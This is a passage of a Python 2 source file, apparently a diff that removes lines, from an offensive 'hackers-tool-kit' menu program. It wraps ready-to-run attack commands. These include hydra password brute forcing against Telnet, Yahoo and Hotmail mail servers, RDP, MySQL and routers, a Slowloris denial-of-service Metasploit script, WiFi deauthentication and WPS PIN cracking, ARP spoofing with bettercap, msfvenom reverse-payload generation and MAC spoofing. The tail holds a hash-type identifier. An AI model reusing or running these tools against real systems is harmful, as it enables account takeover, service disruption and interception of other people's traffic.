bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - 